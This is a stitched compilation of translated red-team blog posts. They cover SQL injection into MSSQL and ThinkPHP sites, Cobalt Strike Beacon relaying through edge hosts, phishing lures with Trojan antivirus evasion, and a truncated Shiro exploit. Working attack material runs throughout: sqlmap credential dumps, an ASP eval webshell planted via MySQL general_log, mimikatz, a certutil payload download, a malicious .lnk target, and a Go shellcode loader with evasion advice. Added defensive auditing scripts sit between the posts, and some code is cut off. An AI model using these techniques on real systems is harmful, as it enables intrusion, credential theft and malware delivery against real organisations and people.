Go to the backend page first. Entering username 123 prompts "user not exists"; entering admin prompts "user or password is incorrect". That confirms the admin account, and there is no captcha, so brute-forcing is possible. The weak password admin / 123456 gets straight into the background. Not many functions and nothing usable. Back to the login for SQL injection: MSSQL, DBA rights, straight to --os-shell. The first machine here had no outbound network access and no echo, so I gave up. After going through several sites I finally found one with outbound access and echo (easy as long as outbound access exists).

CS online

Try CS here; judging that the network is open, generate the PowerShell one-liner directly and it comes online. Check the information, check tasklist. Currently database permissions. I tried escalating, but it disconnected immediately and the website could not be opened. Use this with caution: collect enough information, including patch information, first.

Switched to another site. Find the website path and get a webshell first. Godzilla's SweetPotato escalates to SYSTEM; the CS SweetPotato plug-in also escalated successfully. Grab the administrator password with logonpasswords. Add a hidden (shadow) account with administrator rights. Public-network CS into intranet MSF through frp (first post: FRP+CS to get a local Kali shell). Server side (port 5000 here; I forgot to take a screenshot after modifying it). Client. MSF listens. CS. Next, see whether you can log in as administrator by stealing a token:

```
getuid              // view the current token
use incognito       // load incognito
list_tokens -u      // list access tokens
impersonate_token "
```
-
Title: Various ways to bring CS Beacons online from hosts without outbound access
0x01 There is a transfer machine There is a transfer machine, and this machine is out of the network, which is the most common situation. Often, you get an edge machine, which has multiple network cards, and the intranet machines do not leave the network. In this case, you can use this edge machine to transfer and go online. The topology is roughly as follows : Online method 1: SMB Beacon Introduction Official website introduction: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are connected, the child Beacon obtains the task from the parent Beacon and sends it. Because the connected Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden and may perform miraculously when surrounding the firewall. Using This Beacon requires that the host with an SMB Beacon must accept connections on port 445. Derived an SMB Beacon method: generate SMB Beacon target host in Listner Right-click spawn and select the corresponding Listener to go online Or use the command spawn smb in Beacon (smb is my smb listener name) Use plug-in, or scan the intranet machine with own port Go to view and select the target Using psexec Select a hash, select the smb listener and the corresponding session Go online After successful run, the character ∞∞ can be seen outside, which is the derived SMB Beacon. It is currently connected, you can use the link ip command to link it or the unlink ip command to disconnect it on Beacon. This kind of Beacon is used a lot in the horizontal penetration of the intranet. In an intranet environment, you can use the SMB Beacon generated by ipc$ to upload it to the target host for execution, but the target host will not be directly online. We need to use the link command (link ip) to connect it. 
Online method 2: Relay listener (Reverse TCP Beacon)

In fact it is similar to method 1. The following will be configured automatically. Then, like the above method, find the intranet host whose account password you know and move laterally with psexec, selecting the relay listener.

Online method 3: HTTP proxy

The transit machine does not need to be online. Use the goproxy project as the agent; project address: https://github.com/snail007/goproxy

Process:
1. Upload proxy.exe to the web server (edge host) and enable an http proxy on port 8080:
   C:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon
2. Use the netsh command to redirect traffic arriving at port 822 of the intranet ip 192.168.111.131 (must be an unused port, otherwise it will fail) to port 8080 of the external ip 192.168.1.88:
   netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080
3. Create a listener, configured as follows
4. Generate a stageless payload, execute it on the business server, and it comes online.

Connection process: 192.168.111.236 → 192.168.111.131:822 → 192.168.1.88:8080 → C2 (192.168.1.89)

Online method 4: TCP Beacon (forward)

A forward connection is similar to SMB Beacon: a parent Beacon is also required, and TCP Beacon is compatible with most actions derived from Cobalt Strike, except for some user-driven attacks that require explicit stagers (for example: Attacks → Packages, Attacks → Web Drive-by).

Test: generate a tcp beacon. Use this beacon to generate a stageless payload and upload it to the target machine to run. Use the connect [ip address] [port] command in the Beacon of the transit machine to bring it online. To destroy a Beacon link, use unlink [ip address] [session PID] in the console of the parent or child session. Later, you can reconnect to the TCP Beacon from the same host (or another host).

Online method 5: Use pystinger for proxy forwarding

For detailed use of pystinger see the following chapter; here is a brief demonstration. Generally pystinger will not be used in this scenario.

Test environment: attack machine kali: 192.168.1.35; web server: 192.168.1.70, 192.168.111.129; business server: 192.168.111.236

Process:
1. Upload proxy.php to the web server's website directory; it returns UTF-8 when accessed normally. The web server's external network ip is 192.168.1.70. Upload stinger_server.exe and execute:
   start stinger_server.exe 0.0.0.0
2. Execute on the attack machine (192.168.1.89):
   ./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000
   At this point, port 60020 of the web server has been forwarded to port 60020 of the vps.
3. CS listener settings: HTTP Hosts is the intranet IP of the transit machine, and the port is 60020.
4. Use psexec to move laterally, selecting the pystinger listener, or directly generate a payload and execute it on the business host; the business intranet host 192.168.111.236 comes online.

Supplement: the transfer machine is Linux

HTTP proxy (the transit machine does not need to be online): the usage is the same as method three above.
Just use iptables to forward (the DNAT/SNAT rules belong to the nat table, so -t nat is required):

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp -d 192.168.111.131 --dport 822 -j DNAT --to-destination 192.168.1.88:8080
iptables -t nat -A POSTROUTING -p tcp -d 192.168.1.88 --dport 8080 -j SNAT --to-source 192.168.111.131

Test: transfer machine (192.168.111.142); attack machine. Generate a stageless payload, execute it on the target machine, and it comes online.

Connection process (re-captured screenshot, port changed 8080 → 8081): 192.168.111.140 → 192.168.111.142:8080 → 192.168.111.142:8081 → 192.168.111.131:81 (C2)

Use pystinger for proxy forwarding: like method five above, after establishing the pystinger connection, directly generate a payload and execute it on the business host; the business intranet host 192.168.111.236 comes online.

CrossC2: Beacon can bring Linux machines online through other machines

CrossC2 is used to bring Linux or MacOS machines online. Project address (be sure to download the corresponding version): https://github.com/gloxec/CrossC2

Configuration (I am running teamserver on Windows here): create an https listener, then generate a payload (other ways are also possible); if it cannot be generated from the GUI, you can also generate it directly on the command line. After generation, upload it to the Linux machine and run it to come online. Install the CrossC2Kit plug-in to enrich beacon functions.

After the Linux machine is online through the CS relay, you can use the above methods to bring the intranet machines online. TCP Beacon: upload to the target machine to run, then connect under the Linux beacon. After going online it is a black window, which just about works; the two methods above are still recommended.

0x02 Edge machines only have DNS protocol to go out of the network (DNS)
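Both relay variants above (netsh portproxy on a Windows edge host, iptables DNAT on a Linux one) leave a host-level forwarding rule that a defender can enumerate. The following is an added example, not code from the original post: it parses constructed samples of `netsh interface portproxy show all` and `iptables -t nat -S` output and flags forwards that are not on a hypothetical allow-list, noting when a rule bridges two network segments (the dual-NIC pattern described above).

```python
"""Audit host-level port forwards of the kind used to relay a Beacon through an
edge host: netsh portproxy (Windows) and iptables DNAT (Linux).

Added example; the command outputs are constructed to mirror the addresses in
the post, and APPROVED is a hypothetical allow-list of expected forwards.
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of `netsh interface portproxy show all` on a Windows edge host.
NETSH_SAMPLE = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.111.131 822         192.168.1.88    8080
0.0.0.0         3390        10.10.10.5      3389
"""

# Constructed sample of `iptables -t nat -S` on a Linux edge host.
IPTABLES_SAMPLE = """
-P PREROUTING ACCEPT
-P POSTROUTING ACCEPT
-A PREROUTING -d 192.168.111.131/32 -p tcp -m tcp --dport 822 -j DNAT --to-destination 192.168.1.88:8080
-A POSTROUTING -d 192.168.1.88/32 -p tcp -m tcp --dport 8080 -j SNAT --to-source 192.168.111.131
"""

# Hypothetical allow-list: (listen, target) pairs that are expected on this host.
APPROVED = {("0.0.0.0:3390", "10.10.10.5:3389")}


@dataclass(frozen=True)
class Forward:
    source: str   # "netsh" or "iptables"
    listen: str   # listen address:port
    target: str   # forwarded-to address:port


_NETSH_ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)\s+(\S+)\s+(\d+)\s*$")
_DNAT_RULE = re.compile(
    r"^-A PREROUTING .*?-d (\d{1,3}(?:\.\d{1,3}){3})(?:/32)? .*?--dport (\d+) .*?-j DNAT --to-destination (\S+)"
)


def parse_netsh_portproxy(output):
    """Extract listen/target pairs from `netsh interface portproxy show all` output."""
    forwards = []
    for line in output.splitlines():
        m = _NETSH_ROW.match(line)
        if m:
            forwards.append(Forward("netsh", f"{m.group(1)}:{m.group(2)}", f"{m.group(3)}:{m.group(4)}"))
    return forwards


def parse_iptables_dnat(output):
    """Extract listen/target pairs from DNAT rules in `iptables -t nat -S` output."""
    forwards = []
    for line in output.splitlines():
        m = _DNAT_RULE.match(line.strip())
        if m:
            forwards.append(Forward("iptables", f"{m.group(1)}:{m.group(2)}", m.group(3)))
    return forwards


def crosses_network(fwd, prefix=24):
    """True when listener and target sit in different /prefix networks, i.e. the
    host is bridging two segments (the dual-NIC relay pattern in the post)."""
    listen_ip = ipaddress.ip_address(fwd.listen.rsplit(":", 1)[0])
    target_ip = ipaddress.ip_address(fwd.target.rsplit(":", 1)[0])
    if listen_ip.is_unspecified:
        return False  # 0.0.0.0 says nothing about which segment is listened on
    return ipaddress.ip_network(f"{listen_ip}/{prefix}", strict=False) != \
        ipaddress.ip_network(f"{target_ip}/{prefix}", strict=False)


def suspicious_forwards(forwards, approved=APPROVED):
    """Return (forward, reasons) for every forward that is not allow-listed."""
    findings = []
    for fwd in forwards:
        if (fwd.listen, fwd.target) in approved:
            continue
        reasons = ["not in allow-list"]
        if crosses_network(fwd):
            reasons.append("bridges two network segments")
        findings.append((fwd, reasons))
    return findings


def audit():
    forwards = parse_netsh_portproxy(NETSH_SAMPLE) + parse_iptables_dnat(IPTABLES_SAMPLE)
    return suspicious_forwards(forwards)


if __name__ == "__main__":
    for fwd, reasons in audit():
        print(f"[{fwd.source}] {fwd.listen} -> {fwd.target}: {', '.join(reasons)}")
```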
-
Title: A record of exploiting the Hws Guardian (护卫神) on a gambling site
Because this site is from a few months ago, the pictures may not be complete and there is no way to make up for them. When I was writing this article the couple next door were making a lot of noise, so I could not keep my mind on the writing and may have written a little confusedly. It is also worth asking: why do we so often run into such neighbours when doing security work?

Known target website. The customer has given this kind of website before, so I remember it very deeply. For this kind of website you can usually skip the normal testing process directly, because experience tells me the main website functions rarely have vulnerabilities, so you can only start from the side stations. Ctrl+U, checked the JS and found no leaks. Looking back, I found a discount activity hall in the upper right corner of the website. The page seemed familiar after opening it. I clicked on an activity and it seemed I could submit text at will, with no filtering. I entered an XSS payload with confidence and submitted it. However, two days passed and nothing came of it. My mood was like clouds, fog and rain.

However, I found a review progress query below. After opening it you are asked to enter a user name. Since a user name is entered, it should be a query that goes into the database. I habitually added a ' and clicked query. 10 seconds passed and there was no response; I was confused. Entering a normal, non-existent account popped up a message, but the query with a single quote had no response at all. When I captured the request in F12 → Network, I saw that the request was sent, and the error response made it obvious there was an injection: the page was ThinkPHP, and from the bottom corner the version was 3.2.3. This version is really the black market's favourite: from porn to loan platforms to gambling sites, it is all this version of ThinkPHP.
Try an injection first. Sqlmap got the administrator account and password in one go. Suddenly I realized I did not have a back-end address, so getting them was useless. Fofa gave the real IP in one go, and I found that a phpMyAdmin service exists on port 999 and that 6588 has an ASP site titled Guardian Host Master. Directory brute force, port scanning, subdomain mining: no back-end address was found. os-shell succeeded, but nothing I typed came back; the same for sql-shell. On closer observation I found that the website path was inside the Guardian installation; it may be that the Guardian intercepted it. At the time I was still wondering why this PHP site would use the Guardian. It was not until I searched Baidu for HwsHostMaster ten minutes later that I realized how ignorant I was: the Guardian is not just a WAF, it also has a service called Host Master, with functions roughly like phpStudy. Installing it locally, I found that after Host Master is installed by default, phpMyAdmin is started on port 999 and the management interface on port 6588, which is consistent with the ports I observed on the target IP.

Since the target site has phpMyAdmin, I can try to use sqlmap to enumerate the database accounts and password hashes:

sqlmap -r sql.txt --string='Surname' --users --passwords

Sqlmap enumerated root and test. The root password was not cracked, but the test password was cracked to 1234. Login successful. Regarding this situation, there is an article in Mu Shen's Black and White Day official account that covers it in detail (when Mu Shen sees this, please pay me the advertising fee). There are generally two methods for getting a shell from a MySQL database: INTO OUTFILE, and exporting logs.
According to the file path in the injection error page, construct the statement:

select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'

Error #1 - Can't create/write to file: it should be a lack of permission. Try log writing instead: turn on the general log first, and then

set global general_log_file='D:\\wwwroot\\xxx.com\\web\\a.php'

It seems that it still does not work; I was broken. Suddenly I thought: since this wwwroot directory has no permission, what about the management page of the Guardian Host Master? After flipping through the Host Master files installed locally, I could confirm that the absolute path of the Host Master management page is D:\Hws.com\HwsHostMaster\host\web, so try modifying the log path:

set global general_log_file='D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp'

Succeeded. Then execute select "<%eval request('chopper')%>" and access http://xxx.xxx.xxx.xxx:6588/1.asp: error 404. This problem troubled me for a long time. Later I found out that I need to switch the log file to another path so that the previous log file is released and can be served. Cknife connected successfully. whoami showed SYSTEM permission, so the rest was simple. To avoid detection by the Guardian, an msf payload was generated, downloaded through certutil and executed. msf came online, then migrate process, load mimikatz. After that set I got the remote account password, dumped the database and packed the source code, submitted it to the customer, and it was done.

Summary:
1. The main site has no vulnerabilities, so work on the side station. Here, from the promotional activity hall you find a registration page; you can try to nest an online XSS script to obtain the administrator's cookie, but no cookie was obtained.
2. In the review progress query, enter a real username and add a single quote; the page does not respond.
   F12 showed an error on the page: it is ThinkPHP, version 3.2.3.
3. Inject through sqlmap to obtain the hashes in use. Here you get the hashes of root and test; the test hash can be cracked.
   sqlmap -r sql.txt --string='Surname' --users --passwords
4. Query the other ports of the target website's IP through fofa; ports 999 and 6588 are found: 999 is phpMyAdmin and 6588 is the Guardian management interface.
5. Log in to the phpMyAdmin back-end as test and, according to the physical path of the website shown by the injection error, write a webshell.
6. First write to the web directory via INTO OUTFILE; it shows there is no permission:
   select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'
7. Turn on the general log and point it at the web directory; it still fails:
   set global general_log_file='D:\\wwwroot\\xxx.com\\web\\a.php'
8. Since the wwwroot directory has no permission, can the Guardian Host Master management page be used? Flipping through the locally installed Host Master files confirms that the absolute path of the Host Master management page is D:\Hws.com\HwsHostMaster\host\web. Try modifying the log path:
   set global general_log_file='D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp'
9. Then execute select "<%eval request('chopper')%>"
10. Connect successfully through Cknife.

Reprinted from the original article: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247486068idx=2sn=4e32251aaf8c25efee653b3314a05a29chksm=cfa6ae67f8d127715b23c7b8403a08ccfac2e1bff2ac68030401d54698bcb10cd637a55f7d15scene=178cur_album_id=1553386251775492098#rd
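The whole chain above depends on three server-side conditions: INTO OUTFILE not restricted by secure_file_priv, general_log_file re-pointable into a directory the web server serves, and a weak application account holding FILE/SUPER. The following is an added example, not part of the original article: it audits constructed `SHOW VARIABLES` and `SHOW GRANTS` output against the web roots named in the post (the site's wwwroot and the Host Master management directory) and reports which of those conditions hold.

```python
"""Audit a MySQL server's file-write exposure: INTO OUTFILE scope, a general_log
pointed into a web-served directory, and accounts that can cause either.

Added example; VARIABLES and GRANTS are constructed, WEB_ROOTS mirrors the post.
"""
import re
from pathlib import PureWindowsPath

# Constructed: relevant rows of `SHOW VARIABLES` on a Windows MySQL behind a hosting panel.
VARIABLES = {
    "secure_file_priv": "",          # empty string means INTO OUTFILE may write anywhere
    "general_log": "ON",
    "general_log_file": r"D:\Hws.com\HwsHostMaster\host\web\1.asp",
    "log_output": "FILE",
}

# Constructed: `SHOW GRANTS` for the low-privilege account in the post and an app account.
GRANTS = {
    "test@%": ["GRANT SELECT, INSERT ON *.* TO 'test'@'%'",
               "GRANT SUPER, FILE ON *.* TO 'test'@'%'"],
    "app@localhost": ["GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'app'@'localhost'"],
}

# Directories served over HTTP: the site's web root and the panel's own management UI.
WEB_ROOTS = [r"D:\wwwroot", r"D:\Hws.com\HwsHostMaster\host\web"]

# Privileges that allow writing server-side files or changing globals at runtime.
DANGEROUS_PRIVS = {"FILE", "SUPER", "SYSTEM_VARIABLES_ADMIN", "ALL PRIVILEGES"}


def under_web_root(path, web_roots=WEB_ROOTS):
    """True if `path` lies inside any web-served directory (Windows, case-insensitive)."""
    p = PureWindowsPath(path.lower())
    for root in web_roots:
        r = PureWindowsPath(root.lower())
        if p == r or r in p.parents:
            return True
    return False


def check_variables(variables, web_roots=WEB_ROOTS):
    """Findings about server variables that turn SQL access into file writes."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE can write to any directory")
    elif sfp not in (None, "NULL") and under_web_root(sfp, web_roots):
        findings.append(f"secure_file_priv points into a web root: {sfp}")
    log_on = variables.get("general_log", "OFF").upper() == "ON"
    log_file = variables.get("general_log_file", "")
    if "FILE" in variables.get("log_output", "FILE").upper() and log_file \
            and under_web_root(log_file, web_roots):
        state = "enabled" if log_on else "currently off but"
        findings.append(f"general_log ({state}) writes into a web root: {log_file}")
    return findings


def check_grants(grants):
    """Accounts holding privileges that allow file writes or SET GLOBAL."""
    findings = []
    for account, statements in grants.items():
        held = set()
        for stmt in statements:
            m = re.match(r"GRANT (.+?) ON ", stmt)
            if m:
                held.update(priv.strip().upper() for priv in m.group(1).split(","))
        risky = sorted(held & DANGEROUS_PRIVS)
        if risky:
            findings.append(f"{account} holds {', '.join(risky)}")
    return findings


def audit(variables=VARIABLES, grants=GRANTS, web_roots=WEB_ROOTS):
    return check_variables(variables, web_roots) + check_grants(grants)


if __name__ == "__main__":
    for finding in audit():
        print("-", finding)
    # Remediation belongs in my.ini, not at runtime: secure_file_priv = NULL (or a
    # directory outside every web root), general_log_file outside every web root,
    # and REVOKE FILE, SUPER from application accounts.
```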
-
Title: Phishing techniques and Trojan anti-virus evasion skills
Brief description

Phishing is a common method in offensive and defensive confrontation. Attackers usually disguise themselves as trustworthy entities, such as legal institutions, companies or individuals, to lure victims into revealing sensitive information or performing malicious operations. It can quickly open a breach in the target and get into the intranet to score points. When delivering Trojans, evading anti-virus detection has to be considered. This article focuses on some common phishing methods and Trojan anti-virus evasion.

Information collection

Batch mailbox collection:
https://app.snov.io/
http://www.skymem.info/

Search engine: generally speaking, corporate mailboxes sit behind mail gateways and delivery is easily bounced or blocked, so we need to pick private mailboxes, or mailboxes that the mail server does not block, such as the public-facing addresses on xx reporting or xx recruitment pages. Relevant syntax:
site:'xxx.com' Report
site:'xxx.com' Recruitment
xx company report @126.com
xx company recruitment @qq.com

Phishing techniques

Social engineering phishing: the first thing is target selection. Target groups: HR, managers, finance and other people with weak security awareness are preferred. Prepare multiple scenarios in advance to deal with them. Select a branch of the target company for phishing, which has a higher success rate; think through the wording and responses in advance to avoid being discovered. It is best not to target the headquarters, and avoid the IT and information security department.
Masters of social engineering can try phishing by phone, gaining trust and then adding WeChat to send the Trojan (this requires extraordinary psychological qualities and adaptability; I learned a lot from Pan Gaogong before).

Mail phishing. Mass emails (not recommended: they are easily discovered by administrators or intercepted by mail gateways). Collect key individuals' email addresses for targeted delivery (recommended, highly concealed).

Welfare subsidy distribution: follow current topics and use various welfare activities to attract target users to click; convert the phishing link to a QR code to send.

Resume delivery: deliver resumes to recruitment addresses; HR will not carefully check the suffix when facing a large number of resumes. Can't write phishing copy? It doesn't matter, don't do by hand what can be generated automatically; here's a chicken leg for our ChatGPT brother.

Report letter: xxx real-name reporting and complaints; this kind of email is generally handled and answered quickly.

Phishing file disguise

General tips: Trojans need to be compressed, with a password and hidden content, or the Trojan files double-compressed, to bypass mail gateway detection to some extent. Choose unusual suffixes that still execute as exe, such as scr, com, etc. Give the file a long name: if the file name does not display in full, the suffix will not be visible in the preview.
lnk phishing

If you know that the target unit is not using 360 Tianqing, you can use an lnk file for phishing (360 will intercept it). Fill in the shortcut target:

%windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc && C:\Windows\explorer.exe ".\.__MACOS__\.__MACOS__\.__MACOS1__\fsx.exe"

Icon change, path selection:
C:\Program Files (x86)\Microsoft\Edge\Application
%SystemRoot%\System32\imageres.dll
%SystemRoot%\System32\shell32.dll

Message box error tips

Run a msgbox to show "File is corrupted" and similar confusing content.

vbs implementation:

```vbs
On Error Resume Next
WScript.Sleep 2000
msgbox "The current file is corrupt, please change the tool to open it", 64, "tip"
```

Go implementation:

```go
package main

import (
	"github.com/gen2brain/dlgs"
)

func box() {
	_, err := dlgs.Info("Tip", "The current file is corrupted, please change the tool to open")
	if err != nil {
		panic(err)
	}
}
```

Effect realized.

File bundler

Bind a normal file and the malicious Trojan. After running, the exe deletes itself, then the normal file is released and opened in the current directory, and the Trojan is released to run under the C:\Users\Public\Videos directory. Version 1.1 bypasses common AV (360, Defender, Huorong, etc.); version 1.2 adds automatic hiding of files after they are released. Effect realized.

Common AV types and their features

- Huorong: many restrictions on compilation parameters; hash and string features are recognized. Loaders that are static-clean and decrypt dynamically at run time are basically not detected; some Go libraries are flagged when called.
- 360: a single 360 check is not strict. After the anti-virus component is installed ("your son becomes a father"), detection is greatly improved. The anti-virus automatically uploads samples, so once a sample is in the cloud it is easily detected after a while.
  It is recommended to use separated loading methods and anti-sandbox code to extend the lifetime of the payload.
- 360 core crystal: after enabling it, there is no big impact on overall detection. Avoid loading shellcode via process injection; use a BOF plug-in as the replacement for executing commands.
- Defender: added Cobalt Strike rules; stageless is recommended over staged. The sleep_mask option added in version 4.5 improves evasion, and the detection rate of large files is not high.

Basic loading method

The following is just a basic example which only implements encryption, decryption and loading. First use a Python script to encrypt the payload.c shellcode:

```python
import base64
originalShellcode = b'\xfc\xe8\x89\x00'
encryptedShellcode = bytes([byte ^ 0xFF for byte in originalShellcode])
encodedShellcode = base64.b64encode(encryptedShellcode).decode('utf-8')
print(encodedShellcode)
```

Fill the output into encryptedShellcode and compile (the long base64 blob from the original post is omitted here; note that the XOR key in the loader has to match the one used by the script):

```go
package main

import (
	"encoding/base64"
	"syscall"
	"unsafe"

	"github.com/lxn/win"
	"golang.org/x/sys/windows"
)

func main() {
	// Hide the console window, then decrypt the shellcode via base64 and XOR
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
	encryptedShellcode := "<base64 of the XOR-encrypted shellcode, omitted>"
	decodedShellcode, _ := base64.StdEncoding.DecodeString(encryptedShellcode)
	for i := 0; i < len(decodedShellcode); i++ {
		decodedShellcode[i] ^= 0x77 // XOR key; must match the encryption script
	}
	// Get the VirtualAlloc function in kernel32.dll
	kernel32, _ := syscall.LoadDLL("kernel32.dll")
	VirtualAlloc, _ := kernel32.FindProc("VirtualAlloc")
	// Allocate memory and write shellcode content
	allocSize := uintptr(len(decodedShellcode))
	mem, _, _ := VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
	if mem == 0 {
		panic("VirtualAlloc failed")
	}
	buffer := (*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize]
	copy(buffer, decodedShellcode)
	// Execute shellcode
	syscall.Syscall(mem, 0, 0, 0, 0)
}
```

Universal anti-virus evasion tips: remote loading or separated-file loading is preferred, but each has drawbacks. The former may be traced or blocked by security devices, and the latter requires two files, which is better suited to maintaining access. Fill with junk code: perform harmless operations before loading the shellcode to interfere with sandbox and AV judgement, or bypass detection through delayed execution or by increasing the program's size. Choose a niche language to write the loader and create your own loader features. Besides CS, tools such as vshell and other self-written C2 can be used.
One-click generation with evasion

Shamelessly recommending a GitHub project; ahem, if you think it's OK you can click a star ⭐. The work of evasion master Wang Chao, modified by the demon attack: https://github.com/wangfly-me/LoaderFly
Qianji, Red Team Trojan evasion payload automatic generation: https://github.com/Pizz33/Qianji

Influence of compilation parameters

go:
-race                       race detection compilation
-ldflags "-s -w"            remove compile information
-ldflags "-H windowsgui"    hide window

garble (obfuscation library):
-tiny             delete extra information
-literals         obfuscate literals
-seed=random      random seed (base64-encoded)

For example, if you compile a harmless program with the -literals parameter, 360 will still flag it; without the parameter it will not:

```go
package main

func main() {
	// Two numbers to multiply
	num1 := 5
	num2 := 3
	result := 0
	// Use a for loop to perform multiplication
	for i := 0; i < num2; i++ {
		result += num1
	}
}
```

The -H windowsgui parameter also has a great impact on evasion.
If you need to hide the black console window, you can use the following code instead (but there are still black windows under win11):

```go
package main

import "github.com/lxn/win"

func main() {
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
}
```

or, calling FreeConsole directly:

```go
package main

import "syscall"

func box() int {
	FreeConsole := syscall.NewLazyDLL("kernel32.dll").NewProc("FreeConsole")
	FreeConsole.Call()
	return 0
}

func main() {
	box()
}
```

Static feature processing

Obfuscation: Go low version https://github.com/boy-hack/go-strip ; Go higher version https://github.com/burrowers/garble

mangle, replace strings: https://github.com/optiv/Mangle
Mangle.exe -I xxx.exe -M -O out.exe
Comparing before and after mangle processing, it can be seen that the feature strings of the Go build are replaced with random characters.

base64-encoded variables. Take cmd := exec.Command("rundll32.exe", "xxx"): key strings are Base64-encoded and the variable values at the corresponding positions are replaced:

```go
encodedCommand := "cnVuZGxsMzIuZXhl"
encodedArguments := "MTExTdGFydA=="
// Decode the Base64-encoded command and parameters
decodedCommand, _ := base64.StdEncoding.DecodeString(encodedCommand)
decodedArguments, _ := base64.StdEncoding.DecodeString(encodedArguments)
cmd := exec.Command(string(decodedCommand), string(decodedArguments))
```

QVM bypass

Add resources:
1. Add information such as icon, tag name and copyright; you can use the following projects to add them in one click:
https://github.com/Pizz33/360QVM_bypass
https://github.com/S9MF/my_script_tools/tree/main/360QVM_bypass-public
https://github.com/langsasec/Sign-Sacker

Behavioural characteristics: running the shellcode directly will usually be reported as QVM straight away (in this excerpt kernel32 and decryt are referenced but not defined, and the code is cut off at the end):

```go
package main

import (
	"syscall"
	"unsafe"
)

var (
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

func main() {
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(decryt)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&decryt[0])), uintptr(len(decryt)))
	if err != nil && err.Error() != "The operation completed successfully
```
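The disguises this post describes on the receiving side (unusual suffixes such as scr, com and lnk, long names that push the real suffix out of the preview, password-protected or double-compressed archives) are all visible to a mail gateway before any payload runs. The following is an added example, not code from the original article: it triages constructed attachment names and archive listings against those patterns; the suffix sets and the length threshold are assumptions about local policy.

```python
"""Mail-gateway style triage of attachment names and archive listings for the
disguises described in the post: executable-but-unusual suffixes, long names
that hide the real suffix, and compressed or password-protected Trojans.

Added example; file names and archive member lists are constructed, and the
suffix sets and LONG_NAME_THRESHOLD are policy assumptions.
"""

# Suffixes Windows executes even though users rarely read them as "programs".
EXECUTABLE_SUFFIXES = {"exe", "scr", "com", "pif", "lnk", "bat", "cmd", "vbs",
                       "js", "hta", "msi", "ps1"}
# Suffixes that look like documents and serve as lures (resumes, notices, reports).
DOCUMENT_SUFFIXES = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
ARCHIVE_SUFFIXES = {"zip", "rar", "7z"}
# Preview panes truncate long names; beyond this length the real suffix is unlikely to be seen.
LONG_NAME_THRESHOLD = 60


def suffixes_of(name):
    """Dot-separated suffixes of a name, lower-cased: 'a.pdf.scr' -> ['pdf', 'scr']."""
    parts = name.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def assess_name(name):
    """Reasons a single file name looks like a disguised executable (empty = clean)."""
    reasons = []
    sfx = suffixes_of(name)
    if not sfx or sfx[-1] not in EXECUTABLE_SUFFIXES:
        return reasons
    last = sfx[-1]
    reasons.append(f"executable suffix .{last}")
    if len(sfx) > 1 and sfx[-2] in DOCUMENT_SUFFIXES:
        reasons.append(f"double extension .{sfx[-2]}.{last}")
    if len(name) > LONG_NAME_THRESHOLD:
        reasons.append("long name hides the suffix in preview")
    return reasons


def assess_archive(name, members, encrypted=False):
    """Reasons an archive attachment looks suspicious, given its member names and
    whether its entries are password-protected (the gateway cannot scan those)."""
    reasons = []
    sfx = suffixes_of(name)
    if not sfx or sfx[-1] not in ARCHIVE_SUFFIXES:
        return reasons
    if any(suffixes_of(m) and suffixes_of(m)[-1] in ARCHIVE_SUFFIXES for m in members):
        reasons.append("archive contains another archive (double compression)")
    if encrypted:
        reasons.append("password-protected archive: contents cannot be scanned")
    for m in members:
        reasons.extend(f"member {m}: {r}" for r in assess_name(m))
    return reasons


# Constructed samples: (attachment name, member names if it is an archive, encrypted?).
SAMPLES = [
    ("Resume_Zhang_San.pdf", None, False),
    ("Resume_Zhang_San_Software_Engineer_Shenzhen_2024_final_version_updated.pdf.scr", None, False),
    ("Report_letter.lnk", None, False),
    ("Welfare_subsidy_notice.zip", ["notice.docx", "payload.zip"], True),
    ("Quarterly_report.zip", ["report.xlsx"], False),
]


def triage(samples=SAMPLES):
    """Map each suspicious attachment name to its reasons; clean names are omitted."""
    results = {}
    for name, members, encrypted in samples:
        reasons = assess_archive(name, members, encrypted) if members is not None else assess_name(name)
        if reasons:
            results[name] = reasons
    return results


if __name__ == "__main__":
    for name, reasons in triage().items():
        print(name, "->", "; ".join(reasons))
```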
-
Title: Shiro leaked key, dependency-free gadget chain exploitation technique
Get the environment. Pull the image locally:
$ docker pull medicean/vulapps:s_shiro_1
Start the environment:
$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

1. Use the shiro_attack_2.2 tool to check the target system: a default key is found, but no usable gadget chain.
2. Use shiro_tools.jar to detect the target system directly. After detection completes, the available operations are returned:
